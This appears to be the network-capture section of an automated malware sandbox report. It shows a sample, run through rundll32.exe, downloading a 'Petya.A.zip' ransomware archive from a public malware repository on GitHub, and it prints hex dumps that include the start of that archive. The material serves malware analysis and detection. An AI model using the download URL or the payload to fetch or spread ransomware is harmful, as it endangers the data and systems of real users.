                                                                                                                                                2022-09-29 12:48:42 UTC2044INData Raw: 33 c6 12 1b 13 95 37 fe 03 4a 7a be 31 0e ee 26 99 eb 71 c0 9d 67 da 0a b3 96 82 e6 2f b9 32 5c 73 70 2e 94 ed b6 1f 27 27 36 94 9f b8 ee 4c 69 2a a3 96 c4 26 b3 5b ef 14 02 95 c7 78 17 43 d8 89 7f 4d d8 bc d5 30 40 69 26 ef 95 75 bb e6 d6 45 81 5e 35 e5 73 6a 39 02 ee cd 8c bc 0b 8d 05 a2 64 46 1d 03 df 20 e9 79 d6 2c 43 97 e1 67 c9 a4 aa 5c de 92 15 e7 cc d9 c5 f4 84 2d 34 03 36 75 ae 5b 62 22 39 c1 b7 13 fc 14 e5 15 4e d5 07 81 1d 67 ae 37 09 29 a3 e1 fd 86 62 be 9a 74 d3 4c ec b9 25 d8 7e ff 6e a3 96 94 d0 da c0 6f b1 cc 27 ad fb 07 5f 23 66 f8 36 b1 d9 c0 61 59 73 4c 74 64 ea 7f 25 37 af df 5a 29 40 7d c1 4c b1 ab fb c1 c7 84 7c ad 98 cc e3 39 b3 63 a3 c6 26 c5 eb 32 3b 35 3a af a5 cb fb 6d 62 06 ee b4 7b 27 3a f2 ff 66 ae e8 e3 6b 38 e8 b2 5e ec 27
                                                                                                                                                Data Ascii: 37Jz1&qg/2\sp.''6Li*&[xCM0@i&uE^5sj9dF y,Cg\-46u[b"9Ng7)btL%~no'_#f6aYsLtd%7Z)@}L|9c&2;5:mb{':fk8^'
                                                                                                                                                2022-09-29 12:48:42 UTC2060INData Raw: 1f 5f 1c 07 47 56 41 aa e5 80 0f 97 c3 6b f5 81 a8 78 cb 1a b5 20 e6 6c a9 66 97 05 30 cc be 88 4d e7 46 c8 4a 11 09 42 65 04 a1 ca 2b 9f 7d 36 97 fc 69 93 c6 5d 2c e4 7d 97 65 3e aa cf 75 5d 99 0d 20 cc 5f 21 e6 97 3b 04 e8 0b 35 d9 a8 e7 59 2f 79 a7 66 1f 17 06 2d f4 5b fe c4 27 db ff ea cd 6e bb 72 82 74 6c c5 40 92 a9 a6 7f 98 da d4 67 11 71 d1 0b f1 8d d9 18 9a ae c3 c6 80 f8 00 54 54 fd dc 7f 82 50 47 6f df 44 a8 b8 ce 75 f8 dd fb 71 55 9a 69 97 c3 90 52 45 94 62 7d cf 66 63 74 3f 1f ad 70 32 1d 78 e5 8b 62 24 23 d1 06 8b bb c5 8c 63 a6 15 be f4 24 bd 23 84 81 ab 2c f0 b8 ac bf f8 b2 83 e4 2f 1c 26 92 dd bf 43 b4 ca 68 84 a1 89 b4 cd 5e 78 30 2c 82 57 53 a2 86 0d 76 1a c2 96 4f 21 8a 95 bf af 04 00 af be 6e 60 fa 9f b1 83 b2 7a 5c 54 8b 9c 20 71 a5
                                                                                                                                                Data Ascii: _GVAkx lf0MFJBe+}6i],}e>u] _!;5Y/yf-['nrtl@gqTTPGoDuqUiREb}fct?p2xb$#c$#,/&Ch^x0,WSvO!n`z\T q
                                                                                                                                                2022-09-29 12:48:42 UTC2076INData Raw: cf d7 9c 19 9c 08 36 45 f7 f2 ff 54 f8 84 cf c9 62 97 9f 89 32 02 fc ff ed 8e 22 d9 9a a6 87 02 17 45 32 e4 99 4d 3f 47 b2 a3 77 b9 74 14 94 7d d1 21 67 10 3b 16 c7 be 38 8e ee 5d 17 67 ee 8c d1 44 2f c7 48 4b 39 67 22 a9 b7 f0 7e 44 16 81 a0 52 4c 5c b6 2c b8 75 64 c2 fe f1 d4 3a d6 dc d8 e5 a7 fc 88 3f fb 27 90 a8 42 a5 16 11 40 a0 2f 67 b5 24 6f b3 4d 67 bc 0d e5 dc 39 68 fc 85 21 fa 48 b4 10 da cd 5b d3 3d 0a 3c 02 d2 8e c4 0a 6c 2c 30 dc 6d db 16 36 d1 85 42 3f 2f ce 02 30 ab 60 e7 d2 30 6a c9 ef b2 99 12 0f f6 43 06 a2 f9 df d3 18 27 81 8b 90 f8 75 6c c8 fe ab fe df e0 32 4c 43 20 b9 af 7b ee 80 84 c3 cf 9c be 2f ce ca fb 5a 0c 33 bf 65 47 e2 5a af de c4 2f ee d3 b1 1f 0d e0 fd 49 c0 f3 bb 70 48 84 81 4b eb 57 51 b2 d0 f1 d6 98 69 cb 1b d6 13 7e 75
                                                                                                                                                Data Ascii: 6ETb2"E2M?Gwt}!g;8]gD/HK9g"~DRL\,ud:?'B@/g$oMg9h!H[=<l,0m6B?/0`0jC'ul2LC {/Z3eGZ/IpHKWQi~u
                                                                                                                                                2022-09-29 12:48:42 UTC2092INData Raw: ca dc 1b 3e 83 bb fd 7f eb 33 c7 d5 d8 fc e1 3d d2 10 02 e9 d1 7d a3 9d 5b fe a1 05 4e 66 cb 48 4b 1a 0a 15 22 4b 74 dc df ba 1f 76 40 f3 aa cd 0e 79 9e 7f 75 f7 8b 33 5c a9 d2 53 1a 27 cb cd 26 7f f9 f9 c2 48 6e 46 cd 5b e3 98 96 b4 91 9f f6 28 77 e6 2d 54 03 76 17 57 45 4a 70 a9 d8 1b 57 82 79 01 ed 65 c1 69 0e d2 08 0d a7 da 2f b0 22 2c f4 c9 e3 ac 6c 77 87 57 00 64 67 1d 75 a0 4b 85 88 a3 dd f2 7d 6f cd 0c 34 a4 66 aa ba f3 d7 07 8d 09 60 fe 00 8b 55 3c 05 ad c8 44 1b 8d 39 29 10 c8 62 60 2b 62 a4 ed c1 e7 c6 85 4e 00 69 e4 45 9a 31 cc c8 06 05 8a 67 94 42 af 48 b6 df 70 60 d3 46 03 67 87 c0 d4 64 63 a4 c3 4d 0e d5 89 11 3b 23 0b 5a eb 86 de fb 39 04 2d 8b e1 36 8f 1b 45 f1 63 8b fc 8f d0 48 93 40 f4 e1 fa 2e 6f 82 cb 11 84 8a 1b a2 6e 16 c9 a4 e1 d2
                                                                                                                                                Data Ascii: >3=}[NfHK"Ktv@yu3\S'&HnF[(w-TvWEJpWyei/",lwWdguK}o4f`U<D9)b`+bNiE1gBHp`FgdcM;#Z9-6EcH@.on
                                                                                                                                                2022-09-29 12:48:42 UTC2108INData Raw: 81 d3 2e 67 2e 0f f3 f1 64 a9 5e 03 b4 fd cb 6c ac 8f 83 df 17 e1 7e 84 9b d2 73 a9 82 c5 7c 2c eb ec 2e 45 b9 69 0d d3 76 06 94 f9 c0 35 70 c3 20 62 9c 2e 0c 9a 7d 96 21 09 7a a6 cb e6 fe cb 1e b0 f2 be 03 27 ec 9d 7a e3 4b 2b 14 c9 6c 7a 95 e2 03 e1 ee 09 54 1a 53 33 6c 50 da 51 10 8f b6 3b 5f ff 35 b6 d1 2f f1 f8 a0 ab 89 91 f4 2c 3d c4 cc 5c 8d 9b 03 de a6 77 ed 03 1f aa f7 ca 7b 37 33 e4 33 1c e4 02 43 ff db 1a 6b 68 ea 1b 82 88 71 30 4a 64 9a b4 a2 af 65 70 5a 29 9b df 12 ec d4 ee 46 d9 83 86 31 5a 12 3b 78 a7 35 e4 1b e1 2f 3a 8a 9f 0c aa dc 88 8c 89 53 77 9b 22 08 03 44 51 d3 d9 93 65 68 7e 77 98 fe a5 a7 c8 c7 f4 8e 5c 4d 1d 8a cd e0 ea 92 14 b2 b9 fe f5 be 3d d4 5a f7 f2 a0 0c 3a dc 7e 89 e9 b1 ce a3 69 3f 50 a8 a4 6d 9a be 08 60 d4 0f 74 f4 c3
                                                                                                                                                Data Ascii: .g.d^l~s|,.Eiv5p b.}!z'zK+lzTS3lPQ;_5/,=\w{733Ckhq0JdepZ)F1Z;x5/:Sw"DQeh~w\M=Z:~i?Pm`t
                                                                                                                                                2022-09-29 12:48:42 UTC2124INData Raw: e9 51 b1 09 2a fe 80 eb d5 de 9b 30 de 60 dc 9e 09 8b 33 ee fd d6 bb e0 b7 fd ba 89 e8 13 73 6c 8b f3 ed 8c f7 f0 65 c2 30 5f 0b db 27 1f 23 90 bb e9 c1 4a 43 9b 2f 4f 15 fa 28 34 85 de c8 72 3f 63 0e 6d c9 68 92 a1 d5 1f 68 af 28 89 de 8e c1 77 85 2c 11 26 4d 6c 0d c7 aa 09 ff 96 f8 f6 da b7 01 70 95 90 b6 6b c8 73 e4 62 ae 64 4b 95 10 46 42 2c a2 c4 95 3f ad 2e 73 ec b1 7d 4d d4 81 b1 b1 4d a7 0c f4 18 89 10 fe 01 c2 b5 74 b3 c8 94 4c 1e 79 9a 76 76 28 ec 2a 0d 21 55 d5 97 0d 0c 0c 82 a7 4f 70 54 3c ac 29 29 b6 22 80 77 e1 be 8a fb 29 20 18 4f a1 19 3c c1 69 06 04 00 54 e7 ea d2 49 78 51 fe 0a 0c 42 99 a4 62 56 3b c6 0d 40 cd 86 87 48 b8 90 12 46 66 57 96 96 aa f4 ad ae 1f ae 97 5b d9 b9 fe 98 88 5f 0c a0 e0 02 42 f2 16 de 74 4d a5 96 02 12 6c 10 6a a0
                                                                                                                                                Data Ascii: Q*0`3sle0_'#JC/O(4r?cmhh(w,&MlpksbdKFB,?.s}MMtLyvv(*!UOpT<))"w) O<iTIxQBbV;@HFfW[_BtMlj
                                                                                                                                                2022-09-29 12:48:42 UTC2140INData Raw: a8 8e 95 bb 5c 4b 28 14 5e 48 fd d6 bf cc 2d 9d 9f c5 6d ea 31 c9 61 ba 9e 6a 1e c1 e2 f1 c1 59 43 53 3d 29 46 86 6b 1d f1 48 7a 31 db 44 fa 15 4d 07 08 12 5e dd 86 56 f7 67 6c df a8 c3 d2 67 76 91 b6 08 fd 29 5e a1 f1 3e 41 99 1d cc 4a 0e 52 14 a7 08 65 7b 37 95 44 c2 74 19 eb a8 3e 60 f9 52 cd c4 a7 a8 43 12 6d 2f 2c 20 58 ef 4b 23 1f 6a f3 ae 07 ce 38 63 98 6b 3f e6 73 e2 27 bc b0 41 6c cf 37 47 7f e4 ef 7d 9a bb 7e 05 2a 9c 51 84 e7 35 13 f5 28 bf 2e b4 b7 51 8c 66 b7 fb a7 3f 85 db 6c bf 6a 33 24 f3 06 2f 16 69 9c a9 e5 89 1d 02 43 4b 33 16 f1 56 9f b2 1f 95 d2 3c 54 ed d4 74 4c 3c 4c 17 21 c9 7e f7 69 73 36 95 7d e0 04 2f c2 de 02 a4 a9 22 1c f5 f3 cf f7 e8 01 d8 50 f5 09 92 52 03 c0 74 37 66 1a 2d d1 6b 45 65 1b 2f 95 51 52 03 8c 10 d7 59 93 ad 57
                                                                                                                                                Data Ascii: \K(^H-m1ajYCS=)FkHz1DM^Vglgv)^>AJRe{7Dt>`RCm/, XK#j8ck?s'Al7G}~*Q5(.Qf?lj3$/iCK3V<TtL<L!~is6}/"PRt7f-kEe/QRYW
                                                                                                                                                2022-09-29 12:48:42 UTC2156INData Raw: b3 27 12 88 d9 a5 e1 d1 93 69 a3 65 1a e9 45 18 7d 71 79 4a d7 e2 33 bf 27 0f 9e cc fb 0f 32 d2 24 63 1b 87 9e 22 c7 4a e7 2e d1 24 1b 2b c6 9a ad 44 e1 bf 29 96 ba 95 95 56 83 c7 0a bf ff 9c f6 e6 76 ba e9 dc 28 f7 44 66 e0 80 ec 3f 58 ba c0 07 50 58 64 74 6b 6b f2 12 de 20 85 40 61 c5 c5 11 5e 74 80 f1 5f 02 31 d2 b6 be 5c 1f 39 a2 b0 cf 33 5a cc c4 6c 12 a6 93 85 da ac ba aa ed c9 83 89 09 66 56 e1 50 70 af 67 86 14 66 f8 bb 62 32 49 95 af e1 43 8d 21 c4 8d ac 52 2b 04 8c 6f 34 77 66 f4 7e 74 b3 cb ed 92 45 47 29 7f 3f b3 cd 9a 59 c2 62 9d 10 ba 36 7e d1 76 c6 8c ee 84 55 a9 78 a6 81 8b 3a 44 96 18 80 65 c0 e1 87 57 47 3f 17 9f f1 e6 50 a8 07 10 2a 2f 20 fe 24 42 5c 4e 83 2d 60 07 a8 25 91 5b 2a 1c 4c 45 59 ca 09 31 d3 43 d9 dd df 8c 76 d0 8c de 7c 47
                                                                                                                                                Data Ascii: 'ieE}qyJ3'2$c"J.$+D)Vv(Df?XPXdtkk @a^t_1\93ZlfVPpgfb2IC!R+o4wf~tEG)?Yb6~vUx:DeWG?P*/ $B\N-`%[*LEY1Cv|G
                                                                                                                                                2022-09-29 12:48:42 UTC2172INData Raw: 29 7a 36 a4 0d b9 44 b4 46 6a 78 81 4b 2a 78 86 81 a6 f4 38 6d d0 61 00 4d 84 16 f1 03 12 d2 10 7a 6c e3 d4 e4 9c 1d 61 d3 42 c0 9e ad 95 65 b5 83 7a e5 49 13 b7 3c 1d ca 55 4c d1 23 f5 55 83 1d 47 18 2e bd 80 8b 79 47 a8 ee 89 f0 fc 71 03 28 bf da 57 cf 7c 79 d2 e7 a4 fc 46 7b 9e 24 d6 26 d8 c8 82 c1 85 e2 c2 4c 7c 47 24 0a fb 28 1c 55 ac 98 44 5a 75 26 b9 a2 77 b7 8c 96 22 40 69 38 cb 30 a6 cf 6f 40 5e 72 b4 a5 e6 22 dd a3 bd 9d 9d 05 75 24 d8 5b dd 18 59 b6 7c c2 e7 73 3a 89 8a 7a 3a 92 0e 3b 52 e0 8c 94 52 a5 4d d8 85 47 2f 08 fb c9 44 9d b4 7b 3b 44 97 42 bd ee 9e 7a a0 d0 5c 09 73 69 71 ee 69 ef 09 79 ef c6 6e a1 bf dc be 7f b0 ec 99 22 83 22 08 1c 33 92 c9 53 dd 4c 10 b3 34 65 ea 5e a4 ed db 1c aa d2 91 2e d4 4b b4 85 2e d9 9f f4 ac 62 f0 45 9d ac
                                                                                                                                                Data Ascii: )z6DFjxK*x8maMzlaBezI<UL#UG.yGq(W|yF{$&L|G$(UDZu&w"@i80o@^r"u$[Y|s:z:;RRMG/D{;DBz\siqiyn""3SL4e^.K.bE
                                                                                                                                                2022-09-29 12:48:42 UTC2188INData Raw: ca 14 58 3d ff 8f 92 7c fb db c3 35 35 40 9b 32 ba 11 d4 bb 20 5c 20 c7 88 86 aa ba 2f 55 3c 87 41 96 10 4b 3e e1 0a 2a 19 50 5f 14 db cd a2 77 6b 56 ca 69 36 b9 f4 68 12 55 d0 72 31 2d 19 10 00 47 70 89 8d 6a 71 e8 f1 bc 8d 1c 17 c4 ce 97 73 13 e4 02 2b 72 14 2e c2 08 df ea 9b fa ba 3d 4d 3d d1 78 4c 95 c3 c9 b4 f4 96 be aa 15 27 13 e5 c5 b9 63 fc cf 21 a0 9c e3 31 13 61 71 b3 56 66 82 bd 70 71 48 f0 73 00 4d 9a b8 9e bf f4 98 af a2 b9 c3 d6 63 d1 6c ef 49 99 1a 6c 86 0e 1a d1 a6 fd 46 dc 7f 51 19 6e 88 0c f8 86 c5 f7 31 41 50 ba bc 50 5d d5 66 a3 70 cc 91 8d 6f 56 47 04 39 23 c2 40 96 0d ba 6f a2 1b cc f1 9f ea 00 ed 3f 96 37 f5 2c 50 e9 3a 6f ef 98 0d 85 31 e7 1f 14 d9 79 cf 80 c7 65 00 9d b2 6c b0 d7 b1 f3 d5 99 49 1a de cc 06 75 34 74 05 bc 79 d1 2c
                                                                                                                                                Data Ascii: X=|55@2 \ /U<AK>*P_wkVi6hUr1-Gpjqs+r.=M=xL'c!1aqVfpqHsMclIlFQn1APP]fpoVG9#@o?7,P:o1yelIu4ty,
                                                                                                                                                2022-09-29 12:48:42 UTC2204INData Raw: 1a 1e 4a 1f 18 1f af 94 4a cd c3 cf e6 ad d3 0d e0 e9 55 46 25 1e bc 9c 02 14 4f 57 b0 fd 7b 3f 81 c1 e4 37 61 cc 78 d0 79 05 3a ae 5f de ca 21 5e 3d ad 02 ac 16 62 2f e0 38 bf 27 63 bf ba a5 ed a9 cb ed 2d c2 5d bd eb 55 af c3 a2 04 07 cd 52 c9 28 81 e0 32 57 f6 5e 01 13 f6 21 8d 07 eb ef a7 05 6e 50 eb d9 d0 ff 3b a3 e5 eb 8e 90 d1 20 62 88 4e e3 c7 bf 9a e6 a0 97 86 17 01 fa 97 9e ef 64 eb 21 4f 46 be a9 94 fc 42 fa 32 2a 3b 46 2b 63 c8 2c d1 0d 08 bc 23 4f 65 9f e4 15 d7 d6 c2 28 9a e8 85 ed cb b8 bb f4 36 47 8a fc 56 2f ae 2f 7f 49 b3 de 48 a9 da 2a e3 fd a9 61 4c 1d 43 1a 45 00 01 76 2b ec d4 a8 7c 3e b6 ba e5 59 74 9c 65 cf 60 98 46 17 9b ba 93 7a 60 04 be fe ec d2 a1 eb 3e 70 bb 03 32 84 a0 02 c7 95 9c fc 83 48 f7 00 a5 34 a5 8b 61 fc a7 b7 a0 ec
                                                                                                                                                Data Ascii: JJUF%OW{?7axy:_!^=b/8'c-]UR(2W^!nP; bNd!OFB2*;F+c,#Oe(6GV//IH*aLCEv+|>Yte`Fz`>p2H4a
                                                                                                                                                2022-09-29 12:48:42 UTC2220INData Raw: 24 3e 12 2c a9 4c 9e 65 41 10 66 8d 8c cf 17 2b d0 a4 a0 d7 ac 90 1c 4b c0 91 b8 ea 28 27 fe 9c b3 61 5a b5 d6 b9 36 aa 8e 41 46 d1 a2 37 68 39 14 6d 7c 91 7b bc 9b 8d 71 a0 d8 cb 00 89 83 1b d9 d1 62 5f 5e 80 bb 3a a4 93 ac 85 32 00 78 06 53 94 b3 51 ec e9 d8 09 12 8c 17 99 28 6e 3c fd 3c 74 c3 42 e7 8a 98 9a fb 9b 61 ac 54 0f 2b 0d f3 9f e5 64 5c 9c 2f 7f 30 8b c6 6f be f5 71 78 b7 60 63 3d 33 2d 5f d2 8f 23 b7 d5 23 0d b2 68 5d 03 58 b4 ab 3b 98 26 db 18 83 c9 50 d1 c6 a1 a9 d3 24 3a 47 c7 40 2f b4 89 8a a6 09 e3 8b cc 3b 22 39 2f 75 6d 5a e3 70 49 1e af 2d 8a 85 02 de 9b 29 1c 7d 4e b6 cf d4 4e 68 08 2e c0 fd df 0b 0e 85 e0 cd fb 3c be 38 b3 09 94 ff 5c 43 77 9a 55 51 3e ca b4 53 b4 63 ca e8 dc ce 43 c6 c7 3b e5 d1 5e 08 3a db 14 28 1d 61 64 b5 2b 0a
                                                                                                                                                Data Ascii: $>,LeAf+K('aZ6AF7h9m|{qb_^:2xSQ(n<<tBaT+d\/0oqx`c=3-_##h]X;&P$:G@/;"9/umZpI-)}NNh.<8\CwUQ>ScC;^:(ad+
                                                                                                                                                2022-09-29 12:48:42 UTC2236INData Raw: 32 6a 04 65 db 66 ea 0c 37 aa 79 d5 51 4f 05 50 b4 ea 7f 71 fa 5b 72 c6 9d 59 fc 54 dc c0 d4 e9 98 3d c6 a4 d1 99 95 f3 07 54 be 76 aa 0a 31 16 39 17 7c 5d 02 75 bf 71 58 8a 35 1b e5 a7 00 3a 2f 60 ca dd 40 58 d4 ff 96 c4 4b 25 c0 01 17 d0 ca 0c 48 ab 0d 0a 08 c5 63 7b f0 c1 f3 9a 2a 4a b6 53 60 13 1b fc 81 4a 28 5f 2a a1 50 e3 88 36 11 6e e2 14 7c a9 02 4e 60 ff 41 d6 77 6a 98 96 f6 1a 31 cf 04 e5 c0 ea 52 c8 a4 60 8c 42 03 2a 37 19 8a 2c fb bd d3 1e 7a 28 06 84 44 dc 5c 57 4f f2 4d ec 80 3f 2a bf ab d0 2a 05 67 3e 20 97 ed f4 3f b3 0f 61 66 df 9f e9 33 63 84 95 f5 88 4b 30 db 9c 38 72 c0 46 57 25 7f 07 fb 77 09 a5 e2 23 ba c8 b9 23 b4 66 35 07 3c 26 fc ac a4 25 62 f9 99 73 fe c3 09 a5 74 79 59 c9 8e 3b da 20 f9 7e c7 63 42 d3 81 97 c3 f6 5d cd 35 f2 19
                                                                                                                                                Data Ascii: 2jef7yQOPq[rYT=Tv19|]uqX5:/`@XK%Hc{*JS`J(_*P6n|N`Awj1R`B*7,z(D\WOM?**g> ?af3cK08rFW%w##f5<&%bstyY; ~cB]5
                                                                                                                                                2022-09-29 12:48:42 UTC2252INData Raw: 0b 83 19 52 e6 c9 9b c7 20 96 c1 56 fd 3c 43 40 fe b9 f9 8c e8 b3 78 43 72 3e 92 d7 4a 04 f1 ac 4a c8 e9 78 5a ae 16 7b 6d 0a 98 14 06 3e 3e 65 9b 68 bd 24 24 d7 23 9b 05 0f 2c cb b0 cd b7 89 25 f1 69 9c a6 03 be f6 82 8e 46 78 fd 1e c1 61 1a 55 55 85 17 1d f9 e9 1f 50 4d 1c 77 8f 1d 3a 67 80 4d 9f d4 b6 4a 57 a6 ab bd c7 92 af cd 43 e6 77 a0 a8 4d a3 32 58 b4 d7 a6 2e 46 66 e6 60 cd 64 54 a4 f4 25 63 6e 1a dd 5e 14 07 62 1e 0e c9 5c 25 90 56 77 88 3f b0 37 40 8e 45 7b 75 86 b0 79 30 27 84 51 cb 98 84 e5 79 1c 12 a6 61 a2 97 37 71 7d d3 9e ea 96 7e 72 d1 00 6c 25 33 a5 db d4 17 33 5f b8 12 5c 20 c6 9b ef 40 8b e0 2c bf 5d a3 33 ba 7b bc b8 6f a2 ca e2 1d d7 ca b2 16 8b 2b ea ea 92 df 0c 23 e5 d0 ec 84 23 91 d2 f6 87 3f 00 f6 0c 03 be 46 18 af 0b de cd 0d
                                                                                                                                                Data Ascii: R V<C@xCr>JJxZ{m>>eh$$#,%iFxaUUPMw:gMJWCwM2X.Ff`dT%cn^b\%Vw?7@E{uy0'Qya7q}~rl%33_\ @,]3{o+##?F
                                                                                                                                                2022-09-29 12:48:42 UTC2268INData Raw: 30 75 e9 11 91 4c 04 19 3e c1 f3 22 e4 06 cd f4 e7 75 5f 05 be 1c 40 92 35 2f ee 49 65 6f 82 ec 1a cb bd df ea 23 ba 4c c2 3c 03 f9 05 a4 ef c3 3b 6c 87 7b f6 8c 2e 94 91 b8 e1 1b 4a 71 9b f6 65 b5 03 72 22 07 ac 9f 01 63 ae f1 35 77 48 3c a2 eb 89 77 35 17 c4 72 4e 76 9b 44 78 fe 06 5f 0f 3d 1c df a3 35 d2 94 ae 2b b5 04 84 f9 b4 64 b7 f6 20 98 a0 60 9d 6e a3 36 0f f7 2f dc 20 f6 5e 52 52 96 f9 bd b5 1f 35 f5 0a 72 bd fd ca a0 37 65 8a 62 45 33 75 2d f2 e7 da d9 01 88 aa f9 98 fa 7b 38 a0 09 8e 9d e0 ee f4 10 01 e1 21 0a 17 3b ee 68 34 ab 34 74 2b 38 09 ba 0e 57 8d d3 57 41 fd 4d 3a 71 9c 38 07 00 84 4d 44 3e b7 cd ac 12 44 56 fc 4d 10 a8 02 58 80 02 48 fd dc 62 f7 02 20 a4 cf f0 3e 95 7f 2d 64 42 89 de 6e 8e 4a cc 87 17 ee e2 80 53 72 6c d0 d6 d2 d1 c0
                                                                                                                                                Data Ascii: 0uL>"u_@5/Ieo#L<;l{.Jqer"c5wH<w5rNvDx_=5+d `n6/ ^RR5r7ebE3u-{8!;h44t+8WWAM:q8MD>DVMXHb >-dBnJSrl


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                36192.168.2.349717140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:49 UTC2280OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                37140.82.121.4443192.168.2.349717C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:50 UTC2280INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:49 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:50 UTC2280INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                38192.168.2.349718185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:50 UTC2282OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                39185.199.108.133443192.168.2.349718C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:50 UTC2282INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 131293
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "db31807bd0d2739f220f59cdf06ed3d47d3bb4373e6414156d7274ec658e5f22"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 3596:11E0C:3901A7:400694:63359347
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:50 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6950-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455730.106519,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e2cd1bf337f5869dd1952b15994066b7213d0519
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:50 GMT
                                                                                                                                                Source-Age: 235
                                                                                                                                                2022-09-29 12:48:50 UTC2283INData Raw: 50 4b 03 04 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 c5 69 3f 6d 6a b3 50 f6 03 c1 1a b8 f7 06 bc e8 4e e6 64 7c d2 a2 19 04 df 3e cc 63 7f ad 0d ab 2e 25 b6 c6 4e e4 92 f1 e3 de 02 49 83 18 f7 d9 37 7b e4 46 02 4f c1 d9 09 32 0e 77 54 3a f4 c7 82 67 94 d7 eb 64 67 0d b0 e3 80 9f 7b 94 5f 3a 03 b2 8d ed 60 1a ae e3 cf fd 4c cd b0 e9 b7 a8 f8 6a 52 b8 30 81 64 2c ae 01 f2 35 09 de 93 21 a8 1d ba de 2a 75 36 e3 0e a5 4e b8 6e 38 89 e0 52 ef 05 7b 9e 64 0a dc 0b 7c db 7b bc c0 03 b2 b3 90 ab 1b 0e 5b 9f dc bb d2 04 05 79 0b 66 e5 e5 21 c3 66 ae 41 c6 e9 c6 e8 94 83 82 0c 16 c0 97 6e 6c a7 bd ab 7d f0 b9 d5 df 40 de 8d 1b 1f 06 bc 58 c6 85 8d f0 0d 36 bb 05
                                                                                                                                                Data Ascii: PKtIwH+Endermanch@Petya.A.exei?mjPNd|>c.%NI7{FO2wT:gdg{_:`LjR0d,5!*u6Nn8R{d|{[yf!fAnl}@X6
